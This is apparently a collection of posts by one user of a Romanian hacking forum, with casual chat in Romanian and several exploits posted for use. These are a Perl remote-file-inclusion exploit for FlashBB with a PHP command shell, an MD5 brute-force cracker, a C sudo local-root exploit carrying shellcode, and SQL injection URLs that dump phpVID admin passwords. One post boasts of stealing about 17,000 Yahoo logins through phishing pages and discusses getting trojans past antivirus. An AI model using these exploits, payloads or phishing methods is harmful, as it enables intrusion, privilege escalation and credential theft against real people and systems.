kw3rln

de astazi si la mine o venit o racoare. . perfect va pica vin-ul diseara

Va rog sa-i anuntati si pe ceilalti sa afle ! O sa dau si eu un mass mail cand rezolv cu provideru

Vladiii a zis sa fac un poll .. o venit cu ideea unei subsectiuni la forumul asta unde usergii isi pot expune propriile fotografii si unde se vor organiza concursuri pe aceasta tema

http://www.1-click.jp/

check this out: http://preview.local.live.com/

io`s de vina ca nu l-am intrebat pe zbeng cine l-o facut ! si am pus autor zbeng .. zbeng pune creditz de amu incolo

gata l-am pus pe telefon ! super interesant

nice .. ms zbeng.. de acuma asa fac pozele

http://youtube.com/watch?v=ZlsNSVbAsZM

din cate stiu cel mai mult o trait 2.5 ani

Boala Harlequin ichthyosis http://www.youtube.com/watch?v=JAObCyk4Waw creditz Predator

source leaked

da ar fi fain sa poti pune coolere pe calc si sa le controleze programul automat ! cand sa porneasca in functie de temperatura ... blablalba 10x de tutorial

http://milw0rm.com/exploits/4169 #!/usr/bin/perl # # Flashbb <= 1.1.7 - Remote File Inclusion Exploit # # Url: [url]http://rapidshare.com/files/41426468/FlashBB_AaeDueHFcu.zip[/url] # # Exploit: # [url]http://site.com/[/url][path]/phpbb/sendmsg.php?phpbb_root_path=[Evil_Script>:] # # (c)oded and f0und3d by kw3rln <office[at]rosecuritygroup[dot]net> # # Romanian Security Team .: [url]hTTp://RSTZONE.NET[/url] :. # # # # greetz to all RST [rstzone.net] MEMBERZ use LWP::Simple; print "...........................[RST]...............................\n"; print ". .\n"; print ". Flashbb <= 1.1.7 - Remote File Inclusion Exploit .\n"; print ". .\n"; print "...............................................................\n"; print ". Romanian Security Team -> [url]hTTp://RSTZONE.NET[/url] .\n"; print ". [c]oded by Kw3rLN - [email]office@rosecuritygroup.net[/email] .\n"; print "...............................................................\n\n"; my $kw3,$path,$shell,$conexiune,$cmd,$data ; if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);} $path = $ARGV[0]; chomp($path); $shell = $ARGV[1]; chomp($shell); $path = $path."/phpbb/sendmsg.php"; sub usage(){ print "Usage : perl $0 host/path http://site.com/cmd.txt\n\n"; print "Example : perl $0 [url]http://127.0.0.1[/url] http://site.com/cmd.txt\n\n"; print 'Shell : <?php ob_clean();ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>'; } while () { print "[kw3rln].[rst] :~\$ "; chomp($cmd=<STDIN>); if ($cmd eq "exit") { exit(0);} $kw3 = $path."?phpbb_root_path=".$shell."?&cmd=".$cmd; if ($cmd eq "") { print "Enter your command !\n"; } else { $data=get($kw3); print $data ; } }

#!/usr/bin/perl use Digest::MD5 'md5_hex'; @char = ('a','b','c','d','e','f','g','h','i','j', 'k','l','m','n','o','p','q','r','s','t', 'u','v','w','x','y','z','A','B','C','D','E', 'F','G','H','I','J','K','L','M','N','O', 'P','Q','R','S','T','U','V','W','X','Y','Z', ' ','1','2','3','4','5','6','7','8','9', '0','-','=','!','@','&','+','_','*', '`','~','#','$','%','^','(',')','{','}', '|',':','"','<','>',); $CharToUse = 70; # EDIT: had to take out: [ ] / ' ,; ? ~ \ print "************************************\n"; print " Only for education. \n"; print "MD5- Tries all possible combinations\n"; print " Coded by Tweakz20 \n"; print " Version 1.1 - Handles list in file \n"; print "************************************\n\n"; getmd5(); sub getmd5 { print "\nPlease enter the MD5 file below that contains the list...\n"; chomp($list = <STDIN>); print "\n\n"; testarg(); } sub testarg { open(F, $list) || die ("\nCan't open list!!\n"); @md5 = <F>; $length11 = @md5; if (!<A>){ open(A, ">>MD5.txt") || die ("\nCan't open file to write to!!\n"); } makelist() } sub makelist { for ($br = 7; $br <= 12; $br++) { for ($len1 = 0; $len1 <= $CharToUse; $len1++) { $word[1] = $char[$len1]; if ($br <= 1) { AddToList(@word); } else { for ($len2 = 0; $len2 <= $CharToUse; $len2++) { $word[2] = $char[$len2]; if ($br <= 2) { AddToList(@word); } else { for ($len3 = 0; $len3 <= $CharToUse; $len3++) { $word[3] = $char[$len3]; if ($br <= 3) { AddToList(@word); } else { for ($len4 = 0; $len4 <= $CharToUse; $len4++) { $word[4] = $char[$len4]; if ($br <= 4) { AddToList(@word); } else { for ($len5 = 0; $len5 <= $CharToUse; $len5++) { $word[5] = $char[$len5]; if ($br <= 5) { AddToList(@word); } else { for ($len6 = 0; $len6 <= $CharToUse; $len6++) { $word[6] = $char[$len6]; if ($br <= 6) { AddToList(@word); } else { for ($len7 = 0; $len7 <= $CharToUse; $len7++) { $word[7] = $char[$len7]; if ($br <= 7) { AddToList(@word); } else { for ($len8 = 0; $len8 <= $CharToUse; $len8++) { $word[8] = $char[$len8]; if ($br <= 8) { AddToList(@word); } else { for ($len9 = 0; $len9 <= $CharToUse; $len9++) { $word[9] = $char[$len9]; if ($br <= 9) { AddToList(@word); } else { for ($len10 = 0; $len10 <= $CharToUse; $len10++) { $word[10] = $char[$len10]; if ($br <= 10) { AddToList(@word); } else { for ($len11 = 0; $len11 <= $CharToUse; $len11++) { $word[11] = $char[$len11]; if ($br <= 11) { AddToList(@word); } else { for ($len12 = 0; $len12 <= $CharToUse; $len12++) { $word[12] = $char[$len12]; if ($br <= 12) { AddToList(@word); } else { for ($len13 = 0; $len13 <= $CharToUse; $len13++) { $word[13] = $char[$len13]; if ($br <= 13) { AddToList(@word); } else { for ($len14 = 0; $len14 <= $CharToUse; $len14++) { $word[14] = $char[$len14]; if ($br <= 14) { AddToList(@word); }}}}}}}}}}}}}}}}}}}}}}}}}}}}}} sub AddToList { my (@entry) = @_; my ($test) = join "", @entry; my ($m) = md5_hex "$test"; print ("$m = $test\n"); for ($a = 0; $a <= $length11; $a++) { chomp($md5[$a]); if ($m eq $md5[$a]){ print "\n\n\n**FOUND**\n$test\n\n"; print A "$m = $test\n"; splice(@md5, $a, 1); if (!$md5[0]) { exit(); } } } } sub exit { close(F); }

Interfata Web: http://pixybox.seclab.tuwien.ac.at/pixy/webinterface.php Download: http://pixybox.seclab.tuwien.ac.at/pixy/documentation.php

/************************************************************** PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE * sudo 1.6.8p9 - p12+++ local root * by HST - Hezuah Security Team Iran * * PRIVATE --- DO NOT DISTRIBUTE * * Use sudo's use insecure temp file to feed * buffer overflow. Exploitation: * izik's method of using JMP %ESP for * linux-gate.so.1. Searches for JMP %ESP, very * reliable. But exploit works for *BSD, * but you have to modify -g to get work. * Values of 0xbf0caa2b for FreeBSD 6 work. * * $ ./spwn -f /tmp/fakefile * [+] Starting up... * [+] Finding offset * [+] Found JMP %ESP @ 0xffffe75f * [+] Calculating header * [+] Child calculations * [+] Writing malicious tmp file * [+] Getting child offset * [+] Final value for offset: 0xffffe75f * # whoami * root * # * * or ./spwn -f /tmp/fakefile -g 0xbf0caa2b * * * linux-gate: [url]http://www.milw0rm.com/papers/55[/url] * * ~censored~ whitehats - hack the planet: #hezuah PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE **************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <sys/utsname.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <signal.h> #include <sys/time.h> #include <time.h> unsigned char lincode[] = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x42\x0b\x75\xb6\x66\x68" "\x23\x29\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" "\x89\xe1\xb0\x0b\xcd\x80"; unsigned char bsdcode[] = "\x6a\x61\x58\x99\x52\x42\x52\x42\x52\x68\x42\x0b\x75\xb6\xcd\x80" "\x68\x10\x02\x23\x29\x89\xe1\x6a\x10\x51\x50\x51\x97\x6a\x62\x58" "\xcd\x80\x6a\x02\x59\xb0\x5a\x51\x57\x51\xcd\x80\x49\x79\xf6\x50" "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53" "\xb0\x3b\xcd\x80"; #define OS_LINUX 0 #define OS_BSD 1 #define CMD "/bin/sh" int OS; char **k; unsigned long BSDoffset; //sighandler_t sighandle(int a) //{ // return; //} unsigned long find_esp(unsigned long offset) { int i; char *ptr = (char *) offset; for (i = 0; i < 4095; i++) { if (ptr[i] == '\xff' && ptr[i+1] == '\xe4') { printf("[+] Found JMP %%ESP @ 0x%08x\n", ptr+i); return (unsigned long) ptr+i; } } printf("[-] Didn't find JMP %%ESP, but trying anyway...\n"); return ((unsigned long)ptr); /* sometimes this actually works, why? */ } void revert(char *p,unsigned int size) { char *ptr = p; int i = 0; char *q = p + size; //end for(; p <= q; p +=4) { *p ^= *(p+3); *(p+3) ^= *p; *p ^= *(p+3); *(p+1) ^= *(p+2); *(p+2) ^= *(p+1); *(p+1) ^= *(p+2); } } void set_bytes(char *o, long word) { o[0]=word&0xff; o[1]=(word>>8)& 0xff; o[2]=(word>>16)&0xff; o[3]=(word>>24)&0xff; } char *sudo_own(char *file, unsigned long offset,int mode,int ovr) { char *own = NULL; char *file_ = calloc(strlen(file) + 20,sizeof(char)); int (*get_bytes)(); int cnt = 0; int fp; struct timeval tv; if(offset & 0xffff != 0xe000 || offset & 0xffff0000 != 0xffff0000) offset = 037777760000; printf("[+] Starting up...\n"); if(OS == OS_LINUX) { own = malloc(sizeof(lincode) + 25); memcpy(own+24,lincode,sizeof(lincode)); get_bytes = (int(*)())lincode; } else { own = malloc(sizeof(bsdcode) + 25); memcpy(own+24,bsdcode,sizeof(bsdcode)); get_bytes = (int(*)())bsdcode; } printf("[+] Finding offset\n"); memcpy(own+4,&offset,sizeof(unsigned long)); set_bytes(own + 4,offset); printf("[+] Calculating header\n"); for(cnt = 0; cnt < 16; cnt++) own[cnt] += (offset ^ 0xff & cnt); revert(own,cnt); strcpy(own + 16,file); if(!fork()) { cnt = 0; //signal(1,sighandle); signal(2,sighandle); printf("[+] Child calculations\n"); gettimeofday(&tv,NULL); tv.tv_sec &= 0xfffffe00; snprintf(file_,strlen(file) + 20,"%s.%d.%d",file,getuid() + ovr,tv.tv_sec); if((fp = open(file_,O_CREAT | O_EXCL)) == -1) _exit(-1); printf("[+] Writing malicious tmp file\n"); write(fp,own,30); printf("[+] Getting child offset\n"); close(fp); offset = get_bytes(); execl("/usr/sbin/sudo","-z","--tmpfile",file,CMD+offset); } sleep(1); printf("[+] Final value for offset: 0x%08x\n",offset); if(offset % (++cnt * 3)) printf("[-] Improper value for offset, try -g, -t, or -o\n"),exit(0); return own; } int main(int argc, char **argv) { int c = 0; char *file = NULL; unsigned long offset = 0xffffe000; struct utsname u; int t_mode = 0, try_overwrite = 0; k = argv; while((c = getopt(argc,argv,"hvf:g:to")) != -1) { switch(c) { case 'h': case 'v': printf("~censored~ read the source code\n"); exit(0); case 'f': file = optarg; break; case 'g': offset = strtoul(optarg+2,NULL,16); break; case 't': t_mode = 1; break; case 'o': try_overwrite = 1; break; default: goto START; } } START: if(file == NULL) fprintf(stderr,"specify a file with -f\n"),exit(-1); uname(&u); if(strstr(u.sysname,"BSD") != NULL) OS = OS_BSD; else OS = OS_LINUX; execl("/usr/sbin/sudo","-b","-z", sudo_own(file,offset,t_mode,try_overwrite)); perror("execl"); return 0; }

\Marilyn Manson - Lest We Forget (The Best Of)\06 - Marilyn Manson - The Dope Show.mp3

Ma Duc La Beut [ in 30 min ] Amu imi pare rau de sticlele de vin pline cu apa de pe dulap Inca o mai ramas vecini datori cu beutura .. pana imi doneaza un membru RST cateva casete de bere

MDLB

da spiry... spam 4 ever right?

Post ce l-am pus pe acking.3x dupa cele intamplate ! Cele mai intalnite intrebari de pe forumurile de hack si raspunsurile aferente: Cum se sparge un id de yahoo Raspunsurile pe care le veti da 95% dintre voi: Scam page Troian Keylogger Raspunsul real: Puteti folosi un scam page. perfect... nu zice nimeni ca nu e o incercare buna.. cate usere se furau inainte cu o pagina falsa de logare? va spun eu daca nu stiti .. in 4 luni am luat cam 17000 de usere si parole (acum 3 ani jumatate). Media era cam de 400 usere pe zi dar nu era nimeni atat de tampit incat sa stea zilnic sa fure usere.... care ar fi media in ziua de azi? cam 150 usere pe zi. Di ce? Majoritatea utilizatorilor deja sunt atenti la adresa pe care se logheaza... metoda are deci slabe mult mai mici de reusita. Troian/keylogger .. in acest caz au existat si vor exista intotdeauna anumite probleme. Prima problema este ca multi au antivirus. Daca cumva ii trimiteti un astfel de program automat si antivirusul va “lua masuri”, persoana in cauza se va alarma si nu va mai primi nimic de la voi. Corect pana aici? Cred ca da. Booon. Trecem mai departe... sa zicem ca aveti un troian nedetectabil si vreti sa il trimiteti...ce faceti cu extensia troianului? exe, bat, scr, pif, cmd, nu sunt extensii de incredere deci exista sansa ca potentiala victima sa nu accepte fisierul respectiv. Trecem mai departe cu urmatoarea intrebare pusa zilnic: Cum se poate intra la cineva in calculator? Raspunsul de baza: PRORAAAAAAAAAAT :: yeeeeeeeea Sa vedem. ProRat este dupa cum bine stiti un RAT (remote administration tool) sau in limbaj liber este un troian. Nu zice nimeni ca nu isi face treaba programelul dar totusi sa fim seriosi e vechi de cand lumea si pamantul....de ce dracu il recomanda toata lumea? Functia de reverse connection e de cacat, este detectat de toti antivirusii din lume , este inlaturat de majoritatea antivirusilor , daca este modificat pentru a deveni nedetectabil ii dispar 2 functii si lista poate continua. Sunt forumuri pline de versiuni nedetectabile ale diferitilor troieni de ultima ora si totusi in Romania vad numai “Prorat frate ca e super smecher programu’ asta”. Cretinatati spuse de copii. Limbajul de “hacker” roman. Esti lamer. Esti n00b. Am hackat. Am spart contul de HI5. I-am spart id-ul de Y!Messenger. WTF???? Esti lamer – din toti care folosesc cuvintele astea 10 oameni stiu ce inseamna lamer, iar restul se incadreaza in categoria lameri care ii fac pe altii lameri. Esti n00b – o fraza spusa in general de cei care cred ca prorat este singura metoda de a “sparge” un calculator. Am spart contul de HI5 – penibil... cand o sa spargi HI5.com atunci poti spune asta. I-am spart id-ul de Y!Messenger – valabil pentru cand vei sparge yahoo sau hotmail. Boooon. Mai departe. Cine e cu noi e hacker. Cine nu, e lamer. Daca cineva va sparge forumul, va fura id-ul, va da DDOS, va sparge site-ul, va intra in calculator, niciodata nu va fi mai bun ca voi, corect? Doar pentru ca voi nu o puteti face, nu stiti cum sa o faceti sau nu aveti cu ce sa o faceti, asta nu inseamna ca omul care va da clasa va depaseste (in mintea voastra). Va fi intotdeauna un lamer doar pentru simplul motiv ca nu sunteti voi in locul lui. Toti copii se iau in gura cu cei care se pricep la treburile astea si intotdeauna cei care sufera sunt webmasterii sau administratorii de forumuri si pentru ce? Doar pentru ca un copil idiot vrea sa faca pe grozavul in fata altor copii idioti si se ia in gura cu cine nu trebuie? Va spun eu clar si in fata: de multe ori nu patiti nimic doar pentru ca le e lene altora sa se apuce de voi dar asta nu inseamna ca veti reprezenta ceva mai mult decat o turma de prosti. Vreti sa va spun eu cum stau treburile in acest razboi intre “hackeri”? Atata timp cat un om este inaintea voastra cu un singur pas macar, fie ca e DDOS, fie ca va fura id-ul de messenger, fie ca va sparge site-ul, voi sunteti pierzatorii. Nimeni nu isi aminteste vreodata de pierzatori asa ca pur si simplu iesiti din schema. Nu exista nimic “lame” in razbunare. Cand te razbuni ideea e sa faci cat mai multe pagube indiferent de metode. Ca razbunarea e arma prostului (uneori) e partea a doua, dar razbunarea poate fi aplicata fara probleme in orice mod si orice imprejurare. La final o mica urare pentru toti copii prosti care se cred mai presus ca altii: ma pis pe voi, pe metodele voastre de hackereala cu prorat si scamuri si pe cunostinele voastre despre cum sa te arzi la popou cu proxy switcher activat. Este adresat doar boracilor de pe TOATE forumurile. O sa postez asta si pe forumul meu. Cu multa iubire, kw3rln [ RST ] [ EOF LAMER MANIFESTO ]

Bun venit ! enjoy posting

treb sa-i anunt pe toti de noul domeniu

--==+================================================================================+==-- --==+ phpVID SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SITE: http://www.vastal.com/ DORK: browse_videos.php? DESCRIPTION: pull out multiple admin/users at the same time. EXPLOITS: http://www.server.com/categories_type.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(admin_user,0x3a,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/FROM/**/admin_users/* http://www.server.com/categories_type.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/FROM/**/members/* NOTE/TIP: administrator login is at /admin/ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net ! --==+================================================================================+==-- --==+ phpVID SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- # milw0rm.com [2007-07-06]